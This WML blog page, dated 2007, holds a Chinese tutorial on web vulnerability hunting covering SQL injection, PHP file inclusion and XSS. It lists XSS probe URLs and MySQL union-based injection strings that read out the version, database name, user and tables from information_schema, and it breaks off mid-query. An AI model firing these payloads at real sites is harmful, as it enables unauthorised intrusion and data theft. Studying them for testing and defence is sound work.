
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" "http://www.wapforum.org/DTD/wml_1.1.xml">
<wml>
	<head><meta forua="true" http-equiv="Cache-Control" content="max-age=0" /></head><card id="MainCard" title="&#x6B22;&#x8FCE;&#x5149;&#x4E34;"><p><a href="wap.asp">&#x6728;&#x5B50;&#x5C4B;</a><br/>&nbsp;</p><p><b>&#x6807;&#x9898;&#x3A;</b> &#x57;&#x45;&#x42;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x6280;&#x672F;</p><p><b>&#x4F5C;&#x8005;&#x3A;</b> &#x64;&#x6E;&#x61;&#x77;&#x6F;</p><p><b>&#x65E5;&#x671F;&#x3A;</b> &#x32;&#x30;&#x30;&#x37;&#x2D;&#x30;&#x32;&#x2D;&#x30;&#x36;&#x20;&#x30;&#x39;&#x3A;&#x32;&#x33;&#x20;&#x50;&#x4D;</p><p><b>&#x5206;&#x7C7B;&#x3A;</b> <a href="wap.asp?do=showLog&amp;cateID=11">&#x7F51;&#x7EDC;&#x7834;&#x89E3;</a></p><p><b>&#x5185;&#x5BB9;&#x3A;</b> &#x524D;&#x8A00;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x6280;&#x672F;&#x4E00;&#x76F4;&#x662F;&#x7F51;&#x7EDC;&#x653B;&#x51FB;&#x8005;&#x6700;&#x611F;&#x5174;&#x8DA3;&#x7684;&#x95EE;&#x9898;,&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x7684;&#x8303;&#x56F4;&#x4E5F;&#x5728;&#x968F;&#x7740;&#x6280;&#x672F;&#x7684;&#x63D0;&#x5347;&#x800C;&#x6709;&#x6240;&#x53D8;&#x5316;.&#x5728;&#x524D;&#x671F;&#x9488;&#x5BF9;&#x7F13;&#x51B2;&#x533A;&#x6EA2;&#x51FA; &#x683C;&#x5F0F;&#x5316;&#x5B57;&#x7B26;&#x4E32; &#x5806;&#x6EA2;&#x51FA; lib&#x5E93;&#x6EA2;&#x51FA;&#x7B49;&#x6280;&#x672F;&#x90FD;&#x662F;&#x9488;&#x5BF9;ELF&#x6587;&#x4EF6;(Linux&#x53EF;&#x6267;&#x884C;&#x6587;&#x4EF6;)&#x6216;&#x8005;PE&#x6587;&#x4EF6;(Win&#x53EF;&#x6267;&#x884C;&#x6587;&#x4EF6;)&#x7684;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x6280;&#x672F;.<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#x5728;&#x9488;&#x5BF9;ELF&#x6587;&#x4EF6; PE&#x6587;&#x4EF6;(*.exe&#x4E0E;*.dll)&#x7684;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x8FC7;&#x7A0B;&#x4E2D;,&#x51FA;&#x73B0;&#x4E86;&#x5F88;&#x591A;&#x7684;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x6280;&#x672F;,&#x4F46;&#x662F;&#x9488;&#x5BF9;PE&#x6587;&#x4EF6; ELF&#x6587;&#x4EF6;&#x7684;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x59CB;&#x7EC8;&#x505C;&#x7559;&#x5728;&#x4E86;&#x9ED1;&#x76D2;&#x6D4B;&#x8BD5;(&#x5305;&#x62EC;&#x5355;&#x5143;&#x9ED1;&#x76D2;&#x6D4B;&#x8BD5;)&#x6E90;&#x4EE3;&#x7801;&#x5BA1;&#x8BA1;&#x7B49;&#x529E;&#x6CD5;.&#x901A;&#x8FC7;RATS&#x7B49;&#x6E90;&#x4EE3;&#x7801;&#x5BA1;&#x8BA1;&#x8F6F;&#x4EF6;&#x53EF;&#x4EE5;&#x627E;&#x5230;&#x90E8;&#x5206;&#x6E90;&#x4EE3;&#x7801;&#x7EA7;&#x522B;&#x7684;&#x6F0F;&#x6D1E;&#x4FE1;&#x606F;,&#x4F46;&#x662F;&#x6BD5;&#x7ADF;&#x6E90;&#x4EE3;&#x7801;&#x5BA1;&#x8BA1;&#x8F6F;&#x4EF6;&#x5BFB;&#x627E;&#x7684;&#x591A;&#x6570;&#x4E3A;strcpy memcpy&#x7B49;&#x5B58;&#x5728;&#x7F13;&#x51B2;&#x533A;&#x6EA2;&#x51FA;&#x9057;&#x60A3;&#x7684;C&#x51FD;&#x6570;,&#x6240;&#x4EE5;&#x901A;&#x8FC7;&#x5BA1;&#x8BA1;&#x6E90;&#x4EE3;&#x7801;&#x7684;&#x529E;&#x6CD5;&#x6765;&#x8FDB;&#x884C;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x662F;&#x4E00;&#x4E2A;&#x53EF;&#x80FD;&#x6027;&#x7CFB;&#x6570;&#x5F88;&#x5C0F;&#x7684;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x6280;&#x672F;,&#x800C;&#x9488;&#x5BF9;&#x8F6F;&#x4EF6;&#x7684;&#x9ED1;&#x76D2;&#x5B50;&#x6D4B;&#x8BD5;&#x867D;&#x7136;&#x4E5F;&#x80FD;&#x627E;&#x5230;&#x4E00;&#x4E9B;&#x8F6F;&#x4EF6;&#x7684;&#x6F0F;&#x6D1E;,&#x4F46;&#x53EF;&#x80FD;&#x6027;&#x7CFB;&#x6570;&#x4E5F;&#x4F1A;&#x8F83;&#x5C0F;,&#x5728;&#x56FD;&#x5916;&#x7684;&#x4E00;&#x4E9B;&#x8FDB;&#x884C;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x7684;&#x529E;&#x6CD5;&#x5DF2;&#x7ECF;&#x6162;&#x6162;&#x7684;&#x63D0;&#x5347;&#x4E3A;&#x81EA;&#x5DF1;&#x5199;&#x9ED1;&#x76D2;&#x5B50;&#x6D4B;&#x8BD5;&#x4EE3;&#x7801;,&#x7136;&#x540E;&#x9488;&#x5BF9;&#x7CFB;&#x7EDF;&#x6216;&#x8F6F;&#x4EF6;&#x7684;&#x67D0;&#x4E2A;&#x529F;&#x80FD;&#x6A21;&#x5757;&#x8FDB;&#x884C;&#x6A21;&#x5757;&#x5316;&#x7684;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x6280;&#x672F;.&#x4F8B;&#x5982;Linux&#x5185;&#x6838;&#x7684;&#x5F88;&#x591A;&#x6F0F;&#x6D1E;&#x90FD;&#x662F;&#x901A;&#x8FC7;fuzzing&#x6280;&#x672F;&#x627E;&#x5230;&#x7684;,fuzzing&#x5373;&#x6A21;&#x7CCA;&#x6D4B;&#x8BD5;&#x7684;&#x610F;&#x601D;,&#x5927;&#x5BB6;&#x53EF;&#x4EE5;&#x7406;&#x89E3;&#x4E3A;&#x7C7B;&#x4F3C;SQL&#x76F2;&#x6CE8;&#x5165;&#x7C7B;&#x578B;&#x7684;&#x653B;&#x51FB;&#x6280;&#x672F;.<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x7684;&#x754C;&#x9650;&#x5728;&#x4E0D;&#x65AD;&#x7684;&#x63D0;&#x5347;,&#x76EE;&#x524D;&#x7F13;&#x51B2;&#x533A;&#x6EA2;&#x51FA;&#x6F0F;&#x6D1E;&#x5DF2;&#x7ECF;&#x5982;MS SQL&#x6CE8;&#x5165;&#x822C;&#x7684;&#x88AB;&#x5F88;&#x591A;&#x4EBA;&#x5835;&#x6B7B;,&#x800C;&#x5728;&#x8FDB;&#x884C;&#x7F51;&#x7EDC;&#x5165;&#x4FB5;&#x6E17;&#x900F;&#x7684;&#x8FC7;&#x7A0B;&#x4E2D;,&#x5F88;&#x591A;&#x4EBA;&#x6E17;&#x900F;&#x6210;&#x529F;&#x7684;&#x7740;&#x529B;&#x70B9;&#x90FD;&#x662F;&#x901A;&#x8FC7;WEB&#x5F00;&#x59CB;&#x7684;,&#x5F53;&#x7136;&#x6709;&#x4E9B;&#x4EBA;&#x662F;&#x901A;&#x8FC7;MS SQL&#x6CE8;&#x5165;,&#x6709;&#x4E9B;&#x4EBA;&#x901A;&#x8FC7;&#x5176;&#x5B83;&#x7684;WEB&#x6F0F;&#x6D1E;&#x6280;&#x672F;&#x4E00;&#x6B65;&#x6B65;&#x7684;&#x8D70;&#x5230;&#x4E86;&#x5165;&#x4FB5;&#x6210;&#x529F;&#x7684;&#x6B65;&#x9AA4;.&#x6211;&#x4EEC;&#x4E0B;&#x9762;&#x5C06;&#x4F1A;&#x8BA8;&#x8BBA;&#x4E00;&#x4E9B;WEB&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x7684;&#x7B80;&#x5355;&#x6280;&#x672F;,&#x901A;&#x8FC7;&#x8FD9;&#x4E9B;&#x7B80;&#x5355;&#x6280;&#x672F;&#x7684;&#x89C4;&#x5219;,&#x7136;&#x540E;&#x914D;&#x5408;&#x7ECF;&#x9A8C;&#x7684;&#x63D0;&#x9AD8;,&#x5927;&#x5BB6;&#x6216;&#x8BB8;&#x4F1A;&#x5F97;&#x5230;&#x610F;&#x60F3;&#x4E0D;&#x5230;&#x7684;&#x6548;&#x679C;.<br/>WEB&#x6F0F;&#x6D1E;&#x7684;&#x5206;&#x7C7B;<br/>A: SQL&#x6CE8;&#x5165;(&#x5305;&#x62EC;MSSQL MySQL o&#114;acle&#x7B49;)<br/>&nbsp;&nbsp;&nbsp;&nbsp;SQL&#x6CE8;&#x5165;&#x6F0F;&#x6D1E;,&#x662F;&#x4F9D;&#x9760;&#x5B58;&#x5728;&#x5F31;&#x70B9;&#x7684;WEB&#x811A;&#x672C;&#x4EE3;&#x7801;,&#x6765;&#x5B9E;&#x73B0;&#x901A;&#x8FC7;&#x6D4F;&#x89C8;&#x5668;&#x6267;&#x884C;&#x4EFB;&#x610F;SQL&#x8BED;&#x53E5;,&#x4ECE;&#x800C;&#x5B9E;&#x73B0;&#x6700;&#x7EC8;&#x83B7;&#x53D6;&#x67D0;&#x79CD;&#x6743;&#x9650;&#x7684;&#x653B;&#x51FB;&#x6280;&#x672F;.SQL&#x6CE8;&#x5165;&#x7684;&#x5173;&#x952E;&#x90E8;&#x5206;&#x5728;&#x4E8E;&#x5BF9;&#x5143;&#x6570;&#x636E;&#x7684;&#x5229;&#x7528;,&#x6240;&#x8C13;&#x5143;&#x6570;&#x636E;&#x5373;&#x6570;&#x636E;&#x5E93;&#x7684;&#x57FA;&#x7840;&#x6570;&#x636E;.&#x4F8B;&#x5982;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;database() version()&#x6765;&#x83B7;&#x5F97;&#x6570;&#x636E;&#x5E93;&#x7684;&#x540D;&#x79F0;&#x53CA;&#x7248;&#x672C;,&#x800C;&#x6211;&#x4EEC;&#x901A;&#x8FC7;SQL&#x5185;&#x7F6E;&#x51FD;&#x6570;&#x83B7;&#x5F97;&#x7684;&#x8FD9;&#x4E9B;&#x5185;&#x5BB9;&#x90FD;&#x5C5E;&#x4E8E;&#x6570;&#x636E;&#x5E93;&#x5143;&#x6570;&#x636E;&#x7684;&#x5185;&#x5BB9;.&#x7406;&#x89E3;&#x4E86;&#x5143;&#x6570;&#x636E;&#x7684;&#x6982;&#x5FF5;,&#x5728;&#x540E;&#x9762;&#x7684;&#x7AE0;&#x8282;&#x6211;&#x4F1A;&#x7ED9;&#x5927;&#x5BB6;&#x7B80;&#x5355;&#x7684;&#x8BB2;&#x89E3;&#x4E0B;&#x901A;&#x8FC7;&#x5143;&#x6570;&#x636E;&#x6765;&#x83B7;&#x53D6;MySQL&#x7684;&#x6570;&#x636E;&#x8868;.<br/>B: &#x6587;&#x4EF6;&#x5305;&#x542B;&#x7C7B;&#x578B;,&#x5982;PHP&#x7684;&#x7684;&#x8FDC;&#x7A0B; &#x672C;&#x5730;&#x6587;&#x4EF6;&#x5305;&#x542B;&#x6F0F;&#x6D1E;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#x6587;&#x4EF6;&#x5305;&#x542B;&#x6F0F;&#x6D1E;&#x662F;PHP&#x7A0B;&#x5E8F;&#x7279;&#x6709;&#x7684;&#x4E00;&#x4E2A;&#x5F31;&#x70B9;&#x653B;&#x51FB;,&#x539F;&#x7406;&#x5C31;&#x662F;&#x5728;&#x4F7F;&#x7528;include&#x65F6;&#x6CA1;&#x6709;&#x5B89;&#x5168;&#x7684;&#x7F16;&#x7A0B;,&#x800C;&#x80FD;&#x591F;&#x627E;&#x5230;&#x6587;&#x4EF6;&#x5305;&#x542B;&#x6F0F;&#x6D1E;&#x5219;&#x662F;&#x5165;&#x4FB5;&#x4E00;&#x4E2A;WEB&#x7CFB;&#x7EDF;&#x7684;&#x5F88;&#x91CD;&#x8981;&#x7684;&#x56E0;&#x7D20;,&#x6709;&#x4E86;&#x6587;&#x4EF6;&#x5305;&#x542B;&#x6F0F;&#x6D1E;&#x5219;&#x53EF;&#x4EE5;&#x5F88;&#x5FEB;&#x901F;&#x7684;&#x8FBE;&#x5230;&#x4E0A;&#x4F20;WEBSHELL,&#x7136;&#x540E;&#x672C;&#x5730;&#x63D0;&#x5347;&#x6743;&#x9650;&#x7684;&#x4F5C;&#x7528;.<br/>C: XSS<br/>&nbsp;&nbsp;&nbsp;&nbsp; XSS&#x6F0F;&#x6D1E;&#x662F;&#x88AB;&#x5F88;&#x591A;&#x4EBA;&#x9057;&#x5FD8;&#x7684;&#x6F0F;&#x6D1E;,&#x4F46;&#x662F;XSS&#x4E5F;&#x662F;&#x4E00;&#x4E2A;&#x6BD4;&#x8F83;&#x5371;&#x9669;&#x7684;&#x5B89;&#x5168;&#x9690;&#x60A3;,&#x6211;&#x770B;&#x5230;&#x5F88;&#x591A;&#x56FD;&#x5185;&#x4ECB;&#x7ECD;XSS&#x6F0F;&#x6D1E;&#x7684;&#x6587;&#x7AE0;&#x5927;&#x90E8;&#x5206;&#x5728;&#x5982;&#x4F55;&#x6B3A;&#x9A97;&#x7BA1;&#x7406;&#x5458;&#x83B7;&#x5F97;&#x540E;&#x53F0;&#x767B;&#x9646;&#x5E10;&#x6237;&#x6216;&#x8005;&#x7BA1;&#x7406;&#x5458;&#x7684;cookies&#x6587;&#x4EF6;.&#x4F46;&#x8FD9;&#x4E9B;&#x4EC5;&#x4EC5;&#x662F;XSS&#x6F0F;&#x6D1E;&#x7684;&#x7B80;&#x5355;&#x7528;&#x6CD5;,&#x5982;&#x679C;&#x5BFB;&#x627E;&#x5230;&#x7684;XSS&#x6F0F;&#x6D1E;&#x53EF;&#x4EE5;&#x4EFB;&#x610F;&#x6267;&#x884C;&#x4EFB;&#x4F55;&#x7684;Javascript&#x811A;&#x672C;,&#x90A3;&#x5B89;&#x5168;&#x6027;&#x4E5F;&#x662F;&#x4E0D;&#x5BB9;&#x5FFD;&#x89C6;&#x7684;.&#x901A;&#x8FC7;Javascript&#x811A;&#x672C;&#x5176;&#x5B9E;&#x4E5F;&#x53EF;&#x4EE5;&#x505A;&#x4E00;&#x4E9B;&#x6076;&#x610F;&#x7684;&#x653B;&#x51FB;,&#x751A;&#x81F3;&#x53EF;&#x4EE5;&#x83B7;&#x5F97;&#x4E00;&#x4E9B;WEB&#x7A0B;&#x5E8F;&#x7684;&#x6E90;&#x4EE3;&#x7801;,&#x5F53;&#x7136;&#x8FD9;&#x4E2A;&#x8981;&#x770B;&#x5927;&#x5BB6;&#x5BF9;Javascript&#x811A;&#x672C;&#x7684;&#x719F;&#x6089;&#x7A0B;&#x5EA6;.&#x4F8B;&#x5982;&#x6211;&#x4EEC;&#x8FD9;&#x51E0;&#x5929;&#x516C;&#x5E03;&#x7684;&#x8FD9;&#x4E2A;&#x53EF;&#x8DE8;&#x7AD9;&#x6267;&#x884C;&#x4EFB;&#x610F;Javascript&#x811A;&#x672C;&#x7684;&#x6F0F;&#x6D1E;,&#x6700;&#x540E;&#x6211;&#x4E5F;&#x901A;&#x8FC7;&#x8FD9;&#x4E2A;&#x6F0F;&#x6D1E;&#x7ED9;&#x5BA2;&#x6237;&#x6F14;&#x793A;&#x4E86;&#x5982;&#x4F55;&#x83B7;&#x53D6;&#x4ED6;&#x4EEC;&#x7684;&#x670D;&#x52A1;&#x5668;&#x4FE1;&#x606F;,&#x5E76;&#x6700;&#x7EC8;&#x5B9E;&#x73B0;&#x5F97;&#x5230;&#x5176;&#x4E00;&#x5B9A;&#x6743;&#x9650;&#x7684;&#x65B9;&#x6CD5;.<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#x540C;&#x65F6;&#x4F8B;&#x5982;session&#x6B3A;&#x9A97; cookies&#x6B3A;&#x9A97;,&#x76EE;&#x524D;&#x6211;&#x4E5F;&#x628A;&#x8FD9;&#x4E9B;&#x89C4;&#x5165;&#x4E86;XSS&#x6F0F;&#x6D1E;&#x7684;&#x8303;&#x56F4;,&#x5F53;&#x7136;&#x4EC5;&#x4EC5;&#x7814;&#x7A76;&#x8FD9;&#x4E24;&#x4E2A;&#x6280;&#x672F;&#x4E5F;&#x662F;&#x5F88;&#x503C;&#x5F97;&#x5927;&#x5BB6;&#x53BB;&#x6DF1;&#x5165;&#x7684;&#x8FDB;&#x884C;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x7684;.<br/>WEB&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x89C4;&#x5219;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#x6211;&#x60F3;&#x7ED9;&#x5927;&#x5BB6;&#x4E8B;&#x5148;&#x8BF4;&#x660E;&#x4E0B;,&#x8BE5;&#x6587;&#x6863;&#x7684;&#x6240;&#x6709;&#x5185;&#x5BB9;&#x90FD;&#x4E3A;&#x9ED1;&#x76D2;&#x5B50;&#x6D4B;&#x8BD5;&#x7684;&#x8303;&#x56F4;,&#x4E5F;&#x5373;&#x4F7F;&#x7528;&#x8FD9;&#x4E9B;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x89C4;&#x5219;,&#x5927;&#x5BB6;&#x4EC5;&#x4EC5;&#x9700;&#x8981;&#x4E00;&#x4E2A;WEB&#x6D4F;&#x89C8;&#x5668;,&#x5982;IE Firefox&#x7B49;&#x5373;&#x53EF;,&#x4E5F;&#x65E0;&#x9700;&#x8BFB;&#x53D6;WEB&#x7A0B;&#x5E8F;&#x7684;&#x6E90;&#x4EE3;&#x7801;,&#x53EA;&#x8981;&#x67D0;&#x4E2A;&#x89C4;&#x5219;&#x7B26;&#x5408;&#x4E86;&#x6F0F;&#x6D1E;&#x89C4;&#x5219;&#x7684;&#x8981;&#x6C42;,&#x5927;&#x5BB6;&#x5373;&#x53EF;&#x4EE5;&#x91C7;&#x53D6;&#x76F8;&#x5173;&#x7684;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x6280;&#x672F;&#x8FDB;&#x884C;&#x76F8;&#x5E94;&#x7684;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x529E;&#x6CD5;:)<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#x518D;&#x6B21;&#x7684;&#x7F57;&#x55E6;&#x4E00;&#x4E0B;,&#x5728;&#x672C;&#x6587;&#x6863;&#x6211;&#x6CA1;&#x6709;&#x5B9E;&#x9645;&#x7684;&#x4F8B;&#x5B50;&#x7ED9;&#x5927;&#x5BB6;,&#x4F46;&#x662F;&#x5F88;&#x591A;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x7684;&#x89C4;&#x5219;&#x90FD;&#x662F;&#x4E00;&#x4E9B;&#x7ECF;&#x9A8C;&#x7684;&#x79EF;&#x7D2F;,&#x800C;&#x4E14;&#x5F88;&#x591A;&#x53EF;&#x80FD;&#x5728;&#x5B9E;&#x9645;&#x8FDB;&#x884C;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x65F6;&#x9700;&#x8981;&#x4E0E;&#x5B9E;&#x9645;&#x60C5;&#x51B5;&#x8FDB;&#x884C;&#x5206;&#x6790;&#x5904;&#x7406;,&#x4F8B;&#x5982;:http://website/index1.php?id=&lt;script&gt;alert(&#34;111&#34;)&lt;/script&gt;,&#x5982;&#x679C;&#x5BF9;&#x65B9;&#x7684;&#x4EE3;&#x7801;&#x8FC7;&#x6EE4;&#x4E86;&#34;&#x53CC;&#x5F15;&#x53F7;&#x90A3;&#x4E48;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;http://website/index1.php?id=&lt;script&gt;alert(&#39;111&#39;)&lt;/script&gt;,&#x91C7;&#x7528;&#39;&#x5355;&#x5F15;&#x53F7;&#x6D4B;&#x8BD5;&#x82E5;&#x5355;&#x5F15;&#x53F7;&#x4E5F;&#x8FC7;&#x6EE4;&#x5462;?OK,&#x6211;&#x4EEC;&#x8FD9;&#x6837;&#x6765;&#x6D4B;&#x8BD5;http://website/index1.php?id=&lt;script&gt;alert(111)&lt;/script&gt;&#x4F7F;&#x7528;&#x6570;&#x5B57;&#x63D0;&#x4EA4;,&#x8FD9;&#x6837;&#x6D4B;&#x8BD5;XSS&#x7684;&#x6F0F;&#x6D1E;&#x5C31;&#x6269;&#x5C55;&#x5230;&#x4E86;&#x4E09;&#x6761;:)&#x6709;&#x4E9B;&#x5177;&#x4F53;&#x7684;&#x7AD9;&#x70B9;&#x53EF;&#x80FD;&#x8FD8;&#x4F1A;&#x6709;&#x5F88;&#x591A;&#x7684;&#x95EE;&#x9898;,&#x4F8B;&#x5982;:&#x901A;&#x8FC7;&#x6784;&#x9020;HTML&#x8BED;&#x53E5;&#x6765;&#x5B9E;&#x73B0;XSS&#x6F0F;&#x6D1E;&#x7684;&#x6316;&#x6398;&#x7B49;&#x7B49;.<br/>A: XSS&#x7684;&#x6F0F;&#x6D1E;&#x6316;&#x6398;&#x89C4;&#x5219;<br/>http://website/index1.php?id=&lt;script&gt;alert(&#34;111&#34;)&lt;/script&gt;<br/>http://website/index1.php?id=&lt;script&gt;alert(&#39;111&#39;)&lt;/script&gt;<br/>http://website/index1.php?id=&lt;script&gt;alert(111)&lt;/script&gt;<br/>http://website/index1.php?id=&lt;body+onload=alert(&#34;1111&#34;)&gt;<br/>http://website/index1.php?id=&lt;body+onload=alert(&#39;1111&#39;)&gt;<br/>http://website/index1.php?id=&lt;body+onload=alert(1111)&gt;<br/>http://website/index1.php?id=&lt;img+src=http://OtherWebSite/x.gif+onload=alert(&#34;1111&#34;)&gt;<br/>http://website/index1.php?id=&lt;img+src=http://OtherWebSite/x.gif+onload=alert(&#39;1111&#39;)&gt;<br/>http://website/index1.php?id=&lt;img+src=http://OtherWebSite/x.gif+onload=alert(1111)&gt;<br/>http://website/index1.php?id=&lt;&#34;<br/>http://website/index1.php?id=&lt;&#39;<br/>http://website/index1.php?id=&lt;<br/>http://website/index1.php?id=&lt;!--<br/>http://website/index1.php?id=--&gt;<br/>http://website/index1.php?id=&lt;!-- --&gt;<br/>&#x4F7F;&#x7528;&#x4E0A;&#x9762;&#x7684;&#x8FD9;&#x4E9B;&#x7B80;&#x5355;&#x6F0F;&#x6D1E;&#x89C4;&#x5219;,&#x5982;&#x679C;&#x6A21;&#x7CCA;&#x6D4B;&#x8BD5;&#x4E00;&#x4E9B;&#x7AD9;&#x70B9;&#x7684;&#x8BDD;,&#x662F;&#x53EF;&#x4EE5;&#x627E;&#x5230;&#x4E00;&#x4E9B;XSS&#x6F0F;&#x6D1E;&#x7684;,&#x5F53;&#x7136;&#x8FD9;&#x4E9B;&#x4E0D;&#x662F;&#x5168;&#x90E8;&#x7684;XSS&#x6F0F;&#x6D1E;&#x89C4;&#x5219;,&#x4F46;&#x662F;&#x6211;&#x89C9;&#x5F97;&#x8FD9;&#x4E9B;&#x89C4;&#x5219;&#x6BD4;&#x8F83;&#x7ECF;&#x5178;&#x4E9B;:)&#x6211;&#x6D4B;&#x8BD5;&#x4E00;&#x4E9B;&#x7AD9;&#x70B9;&#x7684;&#x65F6;&#x5019;,&#x4F7F;&#x7528;&#x8FD9;&#x4E9B;&#x89C4;&#x5219;&#x57FA;&#x672C;&#x4E0A;&#x53EF;&#x4EE5;&#x627E;&#x5230;&#x4E00;&#x4E9B;XSS&#x6F0F;&#x6D1E;.<br/>B: SQL Injection<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#x73B0;&#x5728;,MSSQL&#x7684;&#x6CE8;&#x5165;&#x6280;&#x672F;&#x5DF2;&#x7ECF;&#x53D8;&#x7684;&#x5F88;&#x7B80;&#x5355;,&#x4E0B;&#x9762;&#x7684;&#x5185;&#x5BB9;&#x6211;&#x4EEC;&#x9488;&#x5BF9;mysql&#x7684;&#x6CE8;&#x5165;&#x548C;&#x5927;&#x5BB6;&#x4E00;&#x8D77;&#x8BA8;&#x8BBA;&#x4E0B;&#x76F8;&#x5173;&#x7684;&#x6280;&#x672F;,&#x8FD9;&#x4E9B;&#x6280;&#x672F;&#x6709;&#x7B80;&#x5355;&#x7684;,&#x4E5F;&#x6709;&#x4E00;&#x4E9B;&#x6BD4;&#x8F83;&#x590D;&#x6742;&#x7684;.&#x53E6;&#x5916;mysql&#x7684;&#x6CE8;&#x5165;&#x5DE5;&#x5177;&#x76EE;&#x524D;&#x6CA1;&#x6709;&#x4EFB;&#x4F55;&#x6BD4;&#x8F83;&#x5F3A;&#x7684;&#x5DE5;&#x5177;,&#x76EE;&#x524D;&#x4E66;&#x5199;&#x4E00;&#x6B3E;&#x529F;&#x80FD;&#x8F83;&#x5F3A;&#x7684;MySQL&#x6CE8;&#x5165;&#x68C0;&#x6D4B;&#x5DE5;&#x5177;&#x4E5F;&#x57FA;&#x672C;&#x7EB3;&#x5165;&#x4E86;2007&#x5E74;&#x7684;&#x8BA1;&#x5212;&#x5185;.<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#x4E0B;&#x9762;&#x4F1A;&#x9488;&#x5BF9;&#x5404;&#x79CD;&#x89C4;&#x5219;,&#x7136;&#x540E;&#x5BF9;&#x8FD9;&#x4E9B;&#x89C4;&#x5219;&#x8FDB;&#x884C;&#x7B80;&#x5355;&#x7684;&#x8BF4;&#x660E;,&#x5F88;&#x591A;&#x89C4;&#x5219;&#x6211;&#x76F8;&#x4FE1;&#x5927;&#x5BB6;&#x90FD;&#x7528;&#x8FC7;&#x7684;,&#x4E0D;&#x5BF9;&#x7684;&#x5730;&#x65B9;&#x5E0C;&#x671B;&#x5927;&#x5BB6;&#x7ED9;&#x4E88;&#x6307;&#x9488;.&#x4E0B;&#x9762;&#x7684;&#x8FD9;&#x56DB;&#x4E2A;&#x8BED;&#x53E5;&#x5224;&#x65AD;&#x662F;&#x5426;&#x5B58;&#x5728;mysql&#x6CE8;&#x5165;,&#x5176;&#x4E2D;&#39;&#x53F7;&#x7C7B;&#x578B;&#x7684;&#x6D4B;&#x8BD5;&#x5DF2;&#x7ECF;&#x4E0D;&#x662F;&#x5F88;&#x53EF;&#x884C;,&#x7279;&#x522B;&#x5728;PHP5&#x548C;mysql5&#x7684;&#x73AF;&#x5883;&#x4E0B;:)<br/>http://website/index1.php?id=1&#39;<br/>http://website/index1.php?id=1 and 1=1<br/>http://website/index1.php?id=1 and 1=2<br/>http://website/index1.php?id=1 o&#114;der by 4 //4&#x4E3A;&#x5224;&#x65AD;&#x8BE5;&#x8868;&#x7684;&#x5217;&#x6570;,&#x76F4;&#x5230;&#x731C;&#x6D4B;&#x5230;&#x4E3A;&#x6B62;<br/>&#x4E0B;&#x9762;&#x7684;&#x8BED;&#x53E5;&#x6765;&#x83B7;&#x53D6;mysql&#x7684;&#x4E00;&#x4E9B;&#x4FE1;&#x606F;,&#x8FD9;&#x91CC;&#x6211;&#x4EEC;&#x5047;&#x8BBE;&#x6211;&#x4EEC;&#x4F7F;&#x7528;order by&#x8BED;&#x53E5;&#x5224;&#x65AD;&#x51FA;&#x7684;&#x5217;&#x6570;&#x4E3A;4<br/>http://website/index1.php?id=1 and 1=1 union sel&#101;ct 1,2,3,4<br/>http://website/index1.php?id=1 and 1=1 union sel&#101;ct version(),database(),user(),4<br/>http://website/index1.php?id=1 and 1=1 union sel&#101;ct 1/*<br/>http://website/index1.php?id=1 and 1=1 union sel&#101;ct version()/*<br/>http://website/index1.php?id=1 and 1=1 union sel&#101;ct databse()/*<br/>&#x731C;&#x6D4B;&#x8868;&#x540D;:<br/>http://website/index1.php?id=1 and 1=1 union sel&#101;ct 1,2,3,4 from database.table wh&#101;re 1=2//wh&#101;re 1=2 &#x4E0D;&#x6253;&#x5370;&#x731C;&#x6D4B;&#x8868;&#x7684;&#x5185;&#x5BB9;<br/>&#x8FD9;&#x91CC;&#x7684;&#x731C;&#x6D4B;&#x5C31;&#x9700;&#x8981;&#x5927;&#x5BB6;&#x591A;&#x9760;&#x7ECF;&#x9A8C;&#x4E86;,&#x5982;admin user articles news&#x7B49;&#x7B49;,&#x800C;&#x4E14;&#x5FC5;&#x987B;&#x5728;&#x6307;&#x5B9A;sel&#101;ct&#x7684;&#x5B57;&#x6BB5;&#x4E2A;&#x6570;&#x518D;&#x4F7F;&#x7528;,&#x5426;&#x5219;mysql&#x4F1A;&#x62A5;&#x9519;.http://website/index1.php?id=1 and 1=1 union sel&#101;ct table_schema,table_name,table_rows,table_count from information_schema.tables 